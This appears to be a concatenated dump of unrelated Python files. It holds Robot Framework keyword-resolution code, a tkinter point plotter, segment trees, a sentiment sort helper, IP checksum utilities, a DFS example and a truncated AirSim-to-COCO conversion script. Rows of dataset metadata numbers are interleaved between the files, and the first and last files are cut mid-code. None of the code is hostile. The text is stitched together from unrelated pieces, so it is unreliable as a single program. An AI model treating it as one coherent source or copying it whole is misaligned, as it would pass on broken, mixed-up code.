severity=DiagnosticSeverity.INFORMATION,
source=DIAGNOSTICS_SOURCE_NAME,
related_information=[
DiagnosticRelatedInformation(
location=Location(
uri=str(Uri.from_path(allready_imported_library[0].import_source)),
range=allready_imported_library[0].import_range,
),
message="",
)
],
)
)
if (entry.alias or entry.name or entry.import_name) not in self._libraries:
self._libraries[entry.alias or entry.name or entry.import_name] = entry
# TODO Variables
async def _import_default_libraries(self) -> None:
async def _import_lib(library: str) -> Optional[LibraryEntry]:
try:
return await self._get_library_entry(
library, (), None, str(Path(self.source).parent), is_default_library=True
)
except (asyncio.CancelledError, SystemExit, KeyboardInterrupt):
raise
except BaseException as e:
self._diagnostics.append(
Diagnostic(
range=Range.zero(),
message=f"Can't import default library '{library}': {str(e) or type(e).__name__}",
severity=DiagnosticSeverity.ERROR,
source="Robot",
code=type(e).__qualname__,
)
)
return None
for e in await asyncio.gather(*(_import_lib(library) for library in DEFAULT_LIBRARIES)):
if e is not None:
self._libraries[e.alias or e.name or e.import_name] = e
async def _get_library_entry(
self,
name: str,
args: Tuple[Any, ...],
alias: Optional[str],
base_dir: str,
*,
is_default_library: bool = False,
sentinel: Any = None,
) -> LibraryEntry:
library = await self.imports_manager.get_libdoc_for_library_import(
name, args, base_dir=base_dir, sentinel=None if is_default_library else sentinel
)
return LibraryEntry(name=library.name, import_name=name, library_doc=library, args=args, alias=alias)
async def _get_resource_entry(self, name: str, base_dir: str, sentinel: Any = None) -> ResourceEntry:
namespace = await self.imports_manager.get_namespace_for_resource_import(name, base_dir, sentinel=sentinel)
library_doc = await self.imports_manager.get_libdoc_for_resource_import(name, base_dir, sentinel=sentinel)
return ResourceEntry(
name=library_doc.name,
import_name=name,
library_doc=library_doc,
imports=await namespace.get_imports(),
variables=await namespace.get_own_variables(),
)
# TODO get_variables
@_logger.call
async def get_keywords(self) -> List[KeywordDoc]:
await self.ensure_initialized()
if self._keywords is None:
result: Dict[KeywordMatcher, KeywordDoc] = {}
async for name, doc in async_chain(
(await self.get_library_doc()).keywords.items() if (await self.get_library_doc()) is not None else [],
*(e.library_doc.keywords.items() for e in self._resources.values()),
*(e.library_doc.keywords.items() for e in self._libraries.values()),
):
if KeywordMatcher(name) not in result.keys():
result[KeywordMatcher(name)] = doc
self._keywords = list(result.values())
return self._keywords
@_logger.call
async def _analyze(self) -> None:
if not self._analyzed:
async with self._analyze_lock:
try:
self._diagnostics += await Analyzer().get(self.model, self)
lib_doc = await self.get_library_doc()
if lib_doc.errors is not None:
for err in lib_doc.errors:
self._diagnostics.append(
Diagnostic(
range=Range(
start=Position(
line=((err.line_no - 1) if err.line_no is not None else 0),
character=0,
),
end=Position(
line=((err.line_no - 1) if err.line_no is not None else 0),
character=0,
),
),
message=err.message,
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=err.type_name,
)
)
finally:
self._analyzed = True
async def find_keyword(self, name: Optional[str]) -> Optional[KeywordDoc]:
await self.ensure_initialized()
return await KeywordFinder(self).find_keyword(name)
async def find_keyword_threadsafe(self, name: Optional[str]) -> Optional[KeywordDoc]:
return await asyncio.wrap_future(asyncio.run_coroutine_threadsafe(self.find_keyword(name), self._loop))
class DiagnosticsEntry(NamedTuple):
message: str
severity: DiagnosticSeverity
code: Optional[str] = None
class CancelSearchError(Exception):
pass
class KeywordFinder:
def __init__(self, namespace: Namespace) -> None:
super().__init__()
self.namespace = namespace
self.diagnostics: List[DiagnosticsEntry] = []
async def find_keyword(self, name: Optional[str]) -> Optional[KeywordDoc]:
try:
result = await self._find_keyword(name)
if result is None:
self.diagnostics.append(
DiagnosticsEntry(
f"No keyword with name {repr(name)} found.", DiagnosticSeverity.ERROR, "KeywordError"
)
)
return result
except CancelSearchError:
return None
async def _find_keyword(self, name: Optional[str]) -> Optional[KeywordDoc]:
if not name:
self.diagnostics.append(
DiagnosticsEntry("Keyword name cannot be empty.", DiagnosticSeverity.ERROR, "KeywordError")
)
raise CancelSearchError()
if not isinstance(name, str):
self.diagnostics.append(
DiagnosticsEntry("Keyword name must be a string.", DiagnosticSeverity.ERROR, "KeywordError")
)
raise CancelSearchError()
result = await self._get_keyword_from_self(name)
if not result and "." in name:
result = await self._get_explicit_keyword(name)
if not result:
result = await self._get_implicit_keyword(name)
if not result:
result = await self._get_bdd_style_keyword(name)
return result
async def _get_keyword_from_self(self, name: str) -> Optional[KeywordDoc]:
return (await self.namespace.get_library_doc()).keywords.get(name, None)
async def _yield_owner_and_kw_names(self, full_name: str) -> AsyncIterator[Tuple[str, ...]]:
tokens = full_name.split(".")
for i in range(1, len(tokens)):
yield ".".join(tokens[:i]), ".".join(tokens[i:])
async def _get_explicit_keyword(self, name: str) -> Optional[KeywordDoc]:
found: List[Tuple[LibraryEntry, KeywordDoc]] = []
async for owner_name, kw_name in self._yield_owner_and_kw_names(name):
found.extend(await self.find_keywords(owner_name, kw_name))
if len(found) > 1:
self.diagnostics.append(
DiagnosticsEntry(
self._create_multiple_keywords_found_message(name, found, implicit=False),
DiagnosticSeverity.ERROR,
"KeywordError",
)
)
raise CancelSearchError()
return found[0][1] if found else None
async def find_keywords(self, owner_name: str, name: str) -> Sequence[Tuple[LibraryEntry, KeywordDoc]]:
from robot.utils.match import eq
return [
(v, v.library_doc.keywords[name])
async for v in async_chain(self.namespace._libraries.values(), self.namespace._resources.values())
if eq(v.alias or v.name, owner_name) and name in v.library_doc.keywords
]
def _create_multiple_keywords_found_message(
self, name: str, found: Sequence[Tuple[LibraryEntry, KeywordDoc]], implicit: bool = True
) -> str:
error = "Multiple keywords with name '%s' found" % name
if implicit:
error += ". Give the full name of the keyword you want to use"
names = sorted(f"{e[0].alias or e[0].name}.{e[1].name}" for e in found)
return "\n ".join([error + ":"] + names)
async def _get_implicit_keyword(self, name: str) -> Optional[KeywordDoc]:
result = await self._get_keyword_from_resource_files(name)
if not result:
result = await self._get_keyword_from_libraries(name)
return result
async def _get_keyword_from_resource_files(self, name: str) -> Optional[KeywordDoc]:
found: List[Tuple[LibraryEntry, KeywordDoc]] = [
(v, v.library_doc.keywords[name])
async for v in async_chain(self.namespace._resources.values())
if name in v.library_doc.keywords
]
if not found:
return None
if len(found) > 1:
found = await self._get_keyword_based_on_search_order(found)
if len(found) == 1:
return found[0][1]
self.diagnostics.append(
DiagnosticsEntry(
self._create_multiple_keywords_found_message(name, found),
DiagnosticSeverity.ERROR,
"KeywordError",
)
)
raise CancelSearchError()
async def _get_keyword_based_on_search_order(
self, entries: List[Tuple[LibraryEntry, KeywordDoc]]
) -> List[Tuple[LibraryEntry, KeywordDoc]]:
from robot.utils.match import eq
for libname in self.namespace.search_order:
for e in entries:
if eq(libname, e[0].alias or e[0].name):
return [e]
return entries
async def _get_keyword_from_libraries(self, name: str) -> Optional[KeywordDoc]:
found = [
(v, v.library_doc.keywords[name])
async for v in async_chain(self.namespace._libraries.values())
if name in v.library_doc.keywords
]
if not found:
return None
if len(found) > 1:
found = await self._get_keyword_based_on_search_order(found)
if len(found) == 2:
found = await self._filter_stdlib_runner(*found)
if len(found) == 1:
return found[0][1]
self.diagnostics.append(
DiagnosticsEntry(
self._create_multiple_keywords_found_message(name, found),
DiagnosticSeverity.ERROR,
"KeywordError",
)
)
raise CancelSearchError()
async def _filter_stdlib_runner(
self, entry1: Tuple[LibraryEntry, KeywordDoc], entry2: Tuple[LibraryEntry, KeywordDoc]
) -> List[Tuple[LibraryEntry, KeywordDoc]]:
from robot.libraries import STDLIBS
stdlibs_without_remote = STDLIBS - {"Remote"}
if entry1[0].name in stdlibs_without_remote:
standard, custom = entry1, entry2
elif entry2[0].name in stdlibs_without_remote:
standard, custom = entry2, entry1
else:
return [entry1, entry2]
self.diagnostics.append(
DiagnosticsEntry(
self._create_custom_and_standard_keyword_conflict_warning_message(custom, standard),
DiagnosticSeverity.WARNING,
"KeywordError",
)
)
return [custom]
def _create_custom_and_standard_keyword_conflict_warning_message(
self, custom: Tuple[LibraryEntry, KeywordDoc], standard: Tuple[LibraryEntry, KeywordDoc]
) -> str:
custom_with_name = standard_with_name = ""
if custom[0].alias is not None:
custom_with_name = " imported as '%s'" % custom[0].alias
if standard[0].alias is not None:
standard_with_name = " imported as '%s'" % standard[0].alias
return (
f"Keyword '{standard[1].name}' found both from a custom test library "
f"'{custom[0].name}'{custom_with_name} and a standard library '{standard[1].name}'{standard_with_name}. "
f"The custom keyword is used. To select explicitly, and to get "
f"rid of this warning, use either '{custom[0].alias or custom[0].name}.{custom[1].name}' "
f"or '{standard[0].alias or standard[0].name}.{standard[1].name}'."
)
async def _get_bdd_style_keyword(self, name: str) -> Optional[KeywordDoc]:
lower = name.lower()
for prefix in ["given ", "when ", "then ", "and ", "but "]:
if lower.startswith(prefix):
return await self._find_keyword(name[len(prefix) :]) # noqa: E203
return None
| 40.356223 | 120 | 0.519925 | 6,233 | 65,821 | 5.289748 | 0.061287 | 0.010312 | 0.018289 | 0.016954 | 0.589457 | 0.521489 | 0.474265 | 0.444178 | 0.413485 | 0.392132 | 0 | 0.004871 | 0.407378 | 65,821 | 1,630 | 121 | 40.380982 | 0.840388 | 0.010027 | 0 | 0.449521 | 0 | 0.002211 | 0.029126 | 0.004529 | 0 | 0 | 0 | 0.000614 | 0.000737 | 1 | 0.014001 | false | 0.008106 | 0.123066 | 0.008106 | 0.226971 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c8aa12d673cf3649dc9201dd6e2e41e93e6b37f | 2,513 | py | Python | graph.py | monopolize-all/Wave-Sim | f78cfc3195fcf545d585f3dbdfc9c1b9e59798cc | [
"BSD-3-Clause"
] | 1 | 2022-03-31T03:15:02.000Z | 2022-03-31T03:15:02.000Z | graph.py | monopolize-all/Wave-Sim | f78cfc3195fcf545d585f3dbdfc9c1b9e59798cc | [
"BSD-3-Clause"
] | null | null | null | graph.py | monopolize-all/Wave-Sim | f78cfc3195fcf545d585f3dbdfc9c1b9e59798cc | [
"BSD-3-Clause"
] | 1 | 2022-03-18T09:56:50.000Z | 2022-03-18T09:56:50.000Z | import tkinter
from util import Variable_Slider_Widget
class Graph(tkinter.Toplevel):
PLOTTER_SIZE = (400, 400)
PLOTTER_WIDTH, PLOTTER_HEIGHT = PLOTTER_SIZE
BACKGROUND_COLOUR = "#ffffff"
POINTS_COLOUR = "#000000"
POINTS_OFFSET = PLOTTER_SIZE[0] // 2, PLOTTER_SIZE[1] // 2
def __init__(self, master: tkinter.Tk):
super().__init__(master)
mx, my = master.winfo_x(), master.winfo_y()
mw, mh = master.winfo_width(), master.winfo_height()
x = mx + mw + 10
y = my
self.geometry(f"+{x}+{y}")
self.canvas = tkinter.Canvas(self, bg = self.BACKGROUND_COLOUR,
width = self.PLOTTER_WIDTH,
height = self.PLOTTER_HEIGHT)
self.canvas.pack()
self.points_drawn_currently = []
self.point_radius = 1
self.point_radius_slider = Variable_Slider_Widget(self, "Pointer radius",
validate_func = self.point_radius_slider_validate)
self.point_radius_slider.set_limits(1, 20)
self.point_radius_slider.set_value(1)
self.point_radius_slider.set_number_of_values(20)
self.point_radius_slider.pack()
self.origin_at_center_bool = 1
def point_radius_slider_validate(self, var = None, indx = None, mode = None):
self.point_radius = self.point_radius_slider.get_value()
points_to_draw = list(self.points_drawn_currently)
self.clear_canvas()
self.draw_points(points_to_draw)
def clear_canvas(self):
self.canvas.delete("all")
self.points_drawn_currently = []
def draw_points(self, points):
for point in points:
self.draw_point(*point)
def get_plotter_range(self):
start_x = start_y = 0
stop_x, stop_y = self.PLOTTER_SIZE
if self.origin_at_center_bool:
start_x -= self.POINTS_OFFSET[0]
start_y -= self.POINTS_OFFSET[1]
stop_x -= self.POINTS_OFFSET[0]
stop_y -= self.POINTS_OFFSET[1]
return (start_x, stop_x), (start_y, stop_y)
def draw_point(self, x, y):
if self.origin_at_center_bool:
x += self.POINTS_OFFSET[0]
y += self.POINTS_OFFSET[1]
self.canvas.create_oval(x, y, x, y, width = self.point_radius, fill = self.POINTS_COLOUR)
#self.canvas.create_line(x, y, x+1, y, fill = self.POINTS_COLOUR)
self.points_drawn_currently.append((x, y))
| 32.636364 | 97 | 0.619976 | 331 | 2,513 | 4.380665 | 0.253776 | 0.089655 | 0.103448 | 0.101379 | 0.314483 | 0.033103 | 0 | 0 | 0 | 0 | 0 | 0.018722 | 0.277358 | 2,513 | 76 | 98 | 33.065789 | 0.779736 | 0.025468 | 0 | 0.074074 | 0 | 0 | 0.015931 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.037037 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c8d73a16d474beccfcd4957adb9d6ffb14b93ca | 4,388 | py | Python | segment trees/Tree33_update(add lr)_query(weighted sum)_v2.py | DreamShaded/flykiller.github.io | 37b7abc44544613f56ec994452ddd8d2a4ac8df2 | [
"MIT"
] | 5 | 2021-08-10T18:07:39.000Z | 2022-03-26T08:16:24.000Z | segment trees/Tree33_update(add lr)_query(weighted sum)_v2.py | DreamShaded/flykiller.github.io | 37b7abc44544613f56ec994452ddd8d2a4ac8df2 | [
"MIT"
] | null | null | null | segment trees/Tree33_update(add lr)_query(weighted sum)_v2.py | DreamShaded/flykiller.github.io | 37b7abc44544613f56ec994452ddd8d2a4ac8df2 | [
"MIT"
] | 2 | 2021-03-31T18:14:06.000Z | 2021-08-23T04:15:30.000Z | # we can use Segment Tree 24 and Segment Tree 31 and combine them.
class SegmentTree1: # add arithmetic progressions
def __init__(self, n):
self.size = 1
while self.size < n:
self.size *= 2
self.NO_OPERATION = (0, 0) # it should be neutral with respect to op_modify
self.ZERO = 0
self.T = [0] * (2 * self.size - 1)
self.L = [self.NO_OPERATION] * (2 * self.size - 1)
def op_sum(self, a, b):
return a + b
def propagate(self, x, lx, rx):
if self.L[x] == self.NO_OPERATION or rx - lx == 1:
return
mx = (lx + rx)//2
a, d = self.L[x]
a1, d1 = self.L[2 * x + 1]
a2, d2 = self.L[2 * x + 2]
self.L[2 * x + 1] = a + a1, d + d1
self.L[2 * x + 2] = a + d * (mx - lx) + a2, d + d2
self.T[2 * x + 1] += (2 * a + d*(mx - lx - 1)) * (mx - lx)//2
self.T[2 * x + 2] += (2 * a + d*(mx + rx - 2*lx - 1)) * (rx - mx)//2
self.L[x] = self.NO_OPERATION
def _update(self, l, r, a, d, x, lx, rx):
self.propagate(x, lx, rx)
if l >= rx or lx >= r:
return
if lx >= l and rx <= r:
# print("!!!!", lx, rx, l, r)
a1, d1 = self.L[x]
a2, d2 = a + (lx - l) * d, d
self.L[x] = a1 + a2, d1 + d2
self.T[x] += (2 * a2 + d2 * (rx - lx - 1)) * (rx - lx)//2
return
mx = (lx + rx)//2
self._update(l, r, a, d, 2*x+1, lx, mx)
self._update(l, r, a, d, 2*x+2, mx, rx)
self.T[x] = self.op_sum(self.T[2*x+1], self.T[2*x+2])
def update(self, l, r, a, d):
return self._update(l, r, a, d, 0, 0, self.size)
def _query(self, l, r, x, lx, rx):
self.propagate(x, lx, rx)
if l >= rx or lx >= r:
return self.ZERO
if lx >= l and rx <= r:
return self.T[x]
mx = (lx + rx) // 2
m1 = self._query(l, r, 2 * x + 1, lx, mx)
m2 = self._query(l, r, 2 * x + 2, mx, rx)
return self.op_sum(m1, m2)
def query(self, l, r):
return self._query(l, r, 0, 0, self.size)
class SegmentTree2: # add to range, find sum on range
def __init__(self, n, op_modify, op_sum, ZERO):
self.size = 1
while self.size < n:
self.size *= 2
self.T = [0] * (2 * self.size - 1) # to multiply
self.L = [0] * (2 * self.size - 1) # current sum
self.op_modify = op_modify
self.op_sum = op_sum
self.ZERO = ZERO
def _update(self, l, r, v, x, lx, rx):
if l >= rx or lx >= r:
return
if lx >= l and rx <= r:
self.L[x] = self.op_modify(self.L[x], v, 1) # why 1?
self.T[x] = self.op_modify(self.T[x], v, rx - lx)
return
mx = (lx + rx)//2
self._update(l, r, v, 2*x+1, lx, mx)
self._update(l, r, v, 2*x+2, mx, rx)
self.T[x] = self.op_modify(self.op_sum(self.T[2*x+1], self.T[2*x+2]), self.L[x], rx - lx)
def update(self, l, r, v):
return self._update(l, r, v, 0, 0, self.size)
def _query(self, l, r, x, lx, rx):
if l >= rx or lx >= r:
return self.ZERO
if lx >= l and rx <= r:
return self.T[x]
mx = (lx + rx) // 2
m1 = self._query(l, r, 2 * x + 1, lx, mx)
m2 = self._query(l, r, 2 * x + 2, mx, rx)
return self.op_modify(self.op_sum(m1, m2), self.L[x], min(rx, r) - max(lx, l)) # careful here!
def query(self, l, r):
return self._query(l, r, 0, 0, self.size)
if __name__ == '__main__':
n, m = [int(i) for i in input().split()]
STree1 = SegmentTree1(n)
STree2 = SegmentTree2(n, lambda a, b, x: a + b*x, lambda a, b: a+b, 0)
arr = [int(i) for i in input().split()]
for i in range(n):
STree1.update(i, i+1, arr[i]*(i+1), 0) # not optimal way
STree2.update(i, i+1, arr[i])
print(STree1.T)
print(STree2.T)
for i in range(m):
t = [int(i) for i in input().split()]
if t[0] == 1:
STree1.update(t[1] - 1, t[2], t[3]*t[1], t[3])
STree2.update(t[1] - 1, t[2], t[3])
#print(STree1.T)
#print(STree2.T)
else:
m1 = STree1.query(t[1] - 1, t[2])
m2 = STree2.query(t[1] - 1, t[2])
print(m1 - m2*(t[1]-1))
#print(m1, m2) | 34.551181 | 103 | 0.459435 | 770 | 4,388 | 2.550649 | 0.116883 | 0.058554 | 0.027495 | 0.021385 | 0.639002 | 0.546334 | 0.446029 | 0.368635 | 0.35336 | 0.308554 | 0 | 0.056091 | 0.362124 | 4,388 | 127 | 104 | 34.551181 | 0.645588 | 0.069052 | 0 | 0.403846 | 0 | 0 | 0.001965 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0 | 0.048077 | 0.288462 | 0.028846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c8e3ad5fa1769d9fb66fb1f9d1bd81f7b58b1e3 | 586 | py | Python | letters/sort_by.py | clairempr/letterpress | 05af199018b00ecff847789c71adbf9abc53b3a7 | [
"Apache-2.0"
] | 5 | 2017-04-27T19:36:41.000Z | 2020-10-04T15:03:46.000Z | letters/sort_by.py | clairempr/letterpress | 05af199018b00ecff847789c71adbf9abc53b3a7 | [
"Apache-2.0"
] | 14 | 2017-06-17T14:12:34.000Z | 2022-03-11T23:15:32.000Z | letters/sort_by.py | clairempr/letterpress | 05af199018b00ecff847789c71adbf9abc53b3a7 | [
"Apache-2.0"
] | null | null | null | # Used for user-selected sort order
from letter_sentiment.custom_sentiment import get_custom_sentiments
DATE = 'DATE'
RELEVANCE = 'RELEVANCE'
SENTIMENT = 'SENTIMENT'
def get_selected_sentiment_id(filter_value):
if not filter_value.startswith(SENTIMENT):
return 0
sentiment_id = int(filter_value.strip(SENTIMENT))
return sentiment_id
def get_sentiments_for_sort_by_list():
# Just sort by custom sentiment for now
custom_sentiments = [(SENTIMENT + str(sentiment.id), sentiment.name) for sentiment in get_custom_sentiments()]
return custom_sentiments
| 27.904762 | 114 | 0.773038 | 77 | 586 | 5.61039 | 0.428571 | 0.148148 | 0.087963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00202 | 0.15529 | 586 | 20 | 115 | 29.3 | 0.870707 | 0.12116 | 0 | 0 | 0 | 0 | 0.042969 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c8f54bbbfe1e98306867cca1e589d5209ed5cee | 1,419 | py | Python | core/pycopia/inet/packet/inet.py | kdart/pycopia | 1446fabaedf8c6bdd4ab1fc3f0ea731e0ef8da9d | [
"Apache-2.0"
] | 89 | 2015-03-26T11:25:20.000Z | 2022-01-12T06:25:14.000Z | core/pycopia/inet/packet/inet.py | kdart/pycopia | 1446fabaedf8c6bdd4ab1fc3f0ea731e0ef8da9d | [
"Apache-2.0"
] | 1 | 2015-07-05T03:27:43.000Z | 2015-07-11T06:21:20.000Z | core/pycopia/inet/packet/inet.py | kdart/pycopia | 1446fabaedf8c6bdd4ab1fc3f0ea731e0ef8da9d | [
"Apache-2.0"
] | 30 | 2015-04-30T01:35:54.000Z | 2022-01-12T06:19:49.000Z | """Internet packet basic
Simple operations like performing checksums and swapping byte orders.
"""
# Copyright 1997, Corporation for National Research Initiatives
# written by Jeremy Hylton, jeremy@cnri.reston.va.us
#from _ip import *
import array
import struct
from socket import htons, ntohs
def cksum(s):
if len(s) & 1:
s = s + '\0'
words = array.array('h', s)
sum = 0
for word in words:
sum = sum + (word & 0xffff)
hi = sum >> 16
lo = sum & 0xffff
sum = hi + lo
sum = sum + (sum >> 16)
return (~sum) & 0xffff
# Should generalize from the *h2net patterns
# This python code is suboptimal because it is based on C code where
# it doesn't cost much to take a raw buffer and treat a section of it
# as a u_short.
def gets(s):
return struct.unpack('h', s)[0] & 0xffff
def mks(h):
return struct.pack('h', h)
def iph2net(s):
len = htons(gets(s[2:4]))
id = htons(gets(s[4:6]))
off = htons(gets(s[6:8]))
return s[:2] + mks(len) + mks(id) + mks(off) + s[8:]
def net2iph(s):
len = ntohs(gets(s[2:4]))
id = ntohs(gets(s[4:6]))
off = ntohs(gets(s[6:8]))
return s[:2] + mks(len) + mks(id) + mks(off) + s[8:]
def udph2net(s):
sp = htons(gets(s[0:2]))
dp = htons(gets(s[2:4]))
len = htons(gets(s[4:6]))
return mks(sp) + mks(dp) + mks(len) + s[6:]
def net2updh(s):
sp = ntohs(gets(s[0:2]))
dp = ntohs(gets(s[2:4]))
len = ntohs(gets(s[4:6]))
return mks(sp) + mks(dp) + mks(len) + s[6:]
| 22.887097 | 69 | 0.627907 | 262 | 1,419 | 3.39313 | 0.377863 | 0.073116 | 0.067492 | 0.031496 | 0.283465 | 0.152981 | 0.152981 | 0.152981 | 0.152981 | 0.152981 | 0 | 0.04458 | 0.193798 | 1,419 | 61 | 70 | 23.262295 | 0.732517 | 0.292459 | 0 | 0.102564 | 0 | 0 | 0.005045 | 0 | 0 | 0 | 0.024218 | 0 | 0 | 1 | 0.179487 | false | 0 | 0.076923 | 0.051282 | 0.435897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c94c23785142e08b30342809bc3b549b76dac91 | 946 | py | Python | Graph/357 DFS on graph.py | ikaushikpal/DS-450-python | 9466f77fb9db9e6a5bb3f20aa89ba6332f49e848 | [
"MIT"
] | 3 | 2021-06-28T12:04:19.000Z | 2021-09-07T07:23:41.000Z | Graph/357 DFS on graph.py | SupriyoDam/DS-450-python | 5dc21ce61b3279e9bd9d6ef3ad236667227ca283 | [
"MIT"
] | null | null | null | Graph/357 DFS on graph.py | SupriyoDam/DS-450-python | 5dc21ce61b3279e9bd9d6ef3ad236667227ca283 | [
"MIT"
] | 1 | 2021-06-28T15:42:55.000Z | 2021-06-28T15:42:55.000Z | from collections import defaultdict
class Graph:
def __init__(self):
self.graph = defaultdict(list)
def addEdge(self, starting_vertex, end_vertex):
self.graph[starting_vertex].append(end_vertex)
def dfs(self, starting_vertex):
visitedVertices = defaultdict(bool)
vertices = self.graph.keys()
for u in list(self.graph):
if visitedVertices[u] == False:
self.dfsUtil(u, visitedVertices)
def dfsUtil(self, starting_vertex, visitedVertices):
visitedVertices[starting_vertex] = True
print(starting_vertex,end=', ')
for vertex in self.graph[starting_vertex]:
if visitedVertices[vertex] == False:
self.dfsUtil(vertex, visitedVertices)
g = Graph()
g.addEdge('A','B')
g.addEdge('B','D')
g.addEdge('A','C')
g.addEdge('C','D')
# g.addEdge('D','E')
# g.addEdge('E','F')
g.graph['G'] = []
g.dfs('A') | 24.894737 | 56 | 0.612051 | 114 | 946 | 4.964912 | 0.307018 | 0.173145 | 0.095406 | 0.081272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242072 | 946 | 38 | 57 | 24.894737 | 0.7894 | 0.039112 | 0 | 0 | 0 | 0 | 0.01323 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16 | false | 0 | 0.04 | 0 | 0.24 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c98525fcb0d0b1802ff821f7d1db0119cf52338 | 10,149 | py | Python | src/tools/convert_airsimcam_to_coco.py | PhyllisH/CenterNet | dc17ed79329a7a8faeffbd44be85019b4779a371 | [
"MIT"
] | null | null | null | src/tools/convert_airsimcam_to_coco.py | PhyllisH/CenterNet | dc17ed79329a7a8faeffbd44be85019b4779a371 | [
"MIT"
] | null | null | null | src/tools/convert_airsimcam_to_coco.py | PhyllisH/CenterNet | dc17ed79329a7a8faeffbd44be85019b4779a371 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pickle
import json
import numpy as np
import math
import cv2
import os
import random
import matplotlib.pyplot as plt
from pyquaternion import Quaternion
import pycocotools.coco as coco
# DATA_PATH = '../../data/kitti/'
from nuscenes.nuscenes import NuScenes
from nuscenes.utils.data_classes import LidarPointCloud, RadarPointCloud, Box
from nuscenes.utils.geometry_utils import view_points, transform_matrix
train_split = ['scene_0', 'scene_1', 'scene_2', 'scene_3', 'scene_4', 'scene_5',
'scene_6', 'scene_8', 'scene_9', 'scene_10', 'scene_11', 'scene_12',
'scene_13', 'scene_14', 'scene_16', 'scene_17', 'scene_18', 'scene_19',
'scene_20', 'scene_21', 'scene_22', 'scene_23', 'scene_24', 'scene_26',
'scene_28', 'scene_29', 'scene_30', 'scene_31', 'scene_32', 'scene_33',
'scene_34', 'scene_35', 'scene_36', 'scene_37', 'scene_38', 'scene_39',
'scene_40', 'scene_42', 'scene_44', 'scene_45', 'scene_46', 'scene_47',
'scene_48', 'scene_49', 'scene_50', 'scene_51', 'scene_52', 'scene_53',
'scene_55', 'scene_56', 'scene_57', 'scene_61', 'scene_62', 'scene_63',
'scene_65', 'scene_66', 'scene_67', 'scene_68', 'scene_69', 'scene_70',
'scene_71', 'scene_72', 'scene_73', 'scene_75', 'scene_76', 'scene_77',
'scene_78', 'scene_79', 'scene_80', 'scene_81', 'scene_82', 'scene_83',
'scene_84', 'scene_87', 'scene_88', 'scene_90', 'scene_92', 'scene_94',
'scene_95', 'scene_97', 'scene_98', 'scene_99', 'scene_100', 'scene_101',
'scene_102', 'scene_103', 'scene_104', 'scene_105', 'scene_106', 'scene_107',
'scene_108', 'scene_109', 'scene_110', 'scene_111', 'scene_112', 'scene_113',
'scene_114', 'scene_116', 'scene_118', 'scene_119']
val_split = ['scene_7', 'scene_15', 'scene_25', 'scene_27', 'scene_41', 'scene_43',
'scene_54', 'scene_58', 'scene_59', 'scene_60', 'scene_64', 'scene_74',
'scene_85', 'scene_86', 'scene_89', 'scene_91', 'scene_93', 'scene_96',
'scene_115', 'scene_117']
def quaternion2euler(rotation):
w, x, y, z = rotation[0], rotation[1], rotation[2], rotation[3]
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
return roll_x, pitch_y, yaw_z
def _get_rotation_matrix(translation, rotation):
roll, pitch, yaw = quaternion2euler(rotation)
c_y = np.cos(yaw)
s_y = np.sin(yaw)
c_r = np.cos(roll)
s_r = np.sin(roll)
c_p = np.cos(pitch)
s_p = np.sin(pitch)
matrix = np.matrix(np.identity(4))
matrix[0, 3] = translation[0]
matrix[1, 3] = translation[1]
matrix[2, 3] = translation[2]
matrix[0, 0] = c_p * c_y
matrix[0, 1] = c_y * s_p * s_r - s_y * c_r
matrix[0, 2] = -c_y * s_p * c_r - s_y * s_r
matrix[1, 0] = s_y * c_p
matrix[1, 1] = s_y * s_p * s_r + c_y * c_r
matrix[1, 2] = -s_y * s_p * c_r + c_y * s_r
matrix[2, 0] = s_p
